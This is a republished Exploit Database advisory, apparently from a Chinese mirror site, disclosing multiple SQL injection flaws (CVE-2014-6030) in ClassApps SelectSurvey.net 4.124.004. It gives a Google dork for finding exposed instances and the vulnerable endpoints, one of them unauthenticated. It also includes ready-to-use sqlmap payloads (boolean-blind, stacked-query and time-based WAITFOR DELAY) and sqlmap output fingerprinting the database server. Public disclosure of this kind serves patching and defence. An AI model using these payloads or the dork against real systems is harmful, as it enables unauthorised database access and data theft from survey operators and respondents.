ClassApps SelectSurvey.net – Multiple SQL Injections

• Exploit Database
• 11 阅读

• 作者： BillV-Lists
  日期： 2014-09-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34722/

• ##########
  # Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net
  # Google Dork: intitle:SelectSurvey
  # Date: Sep 03 2014
  # Vendor Homepage: https://www.classapps.com/
  # Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp
  # Version: 4.124.004
  # Tested on: Windows 2008 R2/SQL Server 2008
  # CVE: 2014-6030
  ##########
  
  Description
  ==========
  SelectSurvey.net is a web-based survey application written in ASP.net
  and C#. It is vulnerable to multiple SQL injection attacks, both
  authenticated and unauthenticated. The authenticated vulnerability
  resides within the file upload script, as the parameters are not
  sanitized prior to being placed into the SQL query. ClassApps had
  previously listed 'SQL injection protection' as a feature and did have
  several functions in place to attempt to prevent such attacks but due to
  using a "blacklisting" approach, it is possible to circumvent these
  functions. These functions are used elsewhere throughout the application
  to protect GET request variables but are not sufficient. Only this
  specific version of the application has been tested but it is highly
  likely these vulnerabilities exist within prior versions. It has not
  been confirmed that these vulnerabilities are fixed. The vendor stated
  that they would be fixed in this new release however, they do not allow
  download of the code unless you are a customer so fixes have not been
  verified.
  
  Vulnerabilities
  ==========
  Unauthenticated:
  http[s]://<host>/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
  
  Authenticated:
  http[s]://<host>/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
  
  sqlmap identified the following injection points:
  ---
  Place: GET
  Parameter: SurveyID
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur
  
  Type: stacked queries
  Title: Microsoft SQL Server/Sybase stacked queries
  Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--
  
  Type: AND/OR time-based blind
  Title: Microsoft SQL Server/Sybase time-based blind
  Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
  ---
  [14:01:39] [INFO] testing Microsoft SQL Server
  [14:01:39] [INFO] confirming Microsoft SQL Server
  [14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
  [14:01:39] [INFO] fetching banner
  web server operating system: Windows 2008 R2 or 7
  web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
  back-end DBMS operating system: Windows 7 Service Pack 1
  back-end DBMS: Microsoft SQL Server 2008
  banner:
  ---
  Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
  Jun 28 2012 08:36:30
  Copyright (c) Microsoft Corporation
  Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
  Service Pack 1)
  ---